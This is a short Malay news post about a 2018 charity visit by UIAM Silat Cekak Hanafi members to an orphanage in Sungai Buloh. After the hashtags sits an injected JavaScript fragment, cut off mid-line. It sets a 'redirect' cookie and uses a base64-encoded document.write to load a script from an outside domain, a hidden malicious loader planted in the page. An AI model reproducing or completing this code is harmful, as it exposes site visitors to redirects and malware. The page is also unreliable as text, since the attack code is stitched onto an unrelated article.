Bakti Hanafi – Ahli Silat Cekak Hanafi Menabur Bakti Kepada Masyarakat

Paya Jaras, 5 Mei 2018 (Sabtu) – Ahli-ahli Silat Cekak Hanafi Universiti Islam Antarabangsa Malaysia Kampus Gombak (UIAM) bersama Pelajar UIAM berpeluang menabur bakti kepada anak-anak yatim di Rumah Kasih Harmoni, Paya Jaras, Sungai Buloh, Selangor.

Program ‘Bakti Hanafi’ tersebut mencapai beberapa objektif antaranya menyediakan peluang kepada ahli Silat Cekak Hanafi UIAM dan juga pelajar UIAM untuk menabur bakti kepada masyarakat.

Program ini juga menggalakkan ahli Silat Cekak Hanafi untuk memberi bantuan kepada mereka yang lebih memerlukan dan juga memberikan sumbangan barangan asasi kepada anak-anak yatim.

Seramai 35 orang pelajar dan ahli Silat Cekak Hanafi UIAM telah bersama-sama menjadi fasilitator bagi program Bakti Hanafi yang disertai oleh 35 adik-adik dari Rumah Kasih Harmoni yang rata-ratanya berumur 9 tahun hingga 15 tahun.

Tahniah diucapkan kepada Silat Cekak Hanafi UIAM Kampus Gombak. Diharapkan program sebegini dapat diteruskan bagi tahun-tahun mendatang.

#BaktiHanafi
#SayaSilatCekakHanafi
#RumahKasihHarmoni

U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘